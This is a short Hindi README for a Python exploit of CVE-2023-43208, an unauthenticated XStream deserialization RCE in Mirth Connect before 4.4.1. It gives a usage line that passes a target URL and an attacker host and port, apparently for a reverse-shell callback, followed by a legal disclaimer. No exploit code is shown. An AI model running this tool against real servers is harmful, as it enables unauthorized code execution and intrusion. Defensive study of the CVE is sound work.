
पायथन में CVE-2023-43208 Mirth Connect RCE (Unauth XStream) का कार्यान्वयन
यह एक्सप्लॉइट Mirth Connect के XStream इंजन के भीतर एक गंभीर डिसीरियलाइज़ेशन भेद्यता का लाभ उठाता है। यह CVE-2023-37679 के अधूरे पैच से उत्पन्न होता है, जो 4.4.1 से पहले के सभी संस्करणों में अनप्रमाणित मनमाना कोड निष्पादन को सक्षम बनाता है।
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
यह एक्सप्लॉइट स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा ऑडिटिंग के लिए है, ताकि रक्षकों को CVE-2023-43208 को कम करने में सहायता मिल सके; अनधिकृत लक्ष्यों के विरुद्ध इस उपकरण का कोई भी उपयोग अवैध है और अंतिम उपयोगकर्ता की एकमात्र जिम्मेदारी है। लेखक इस सॉफ़्टवेयर को बिना किसी वारंटी के "जैसा है" प्रदान करता है, संभावित दुरुपयोग या क्षति के लिए सभी दायित्व को अस्वीकार करता है, और अनधिकृत गतिविधियों का समर्थन या प्रोत्साहन नहीं करता है। अपने जोखिम पर और केवल लागू कानूनों के अनुपालन में उपयोग करें।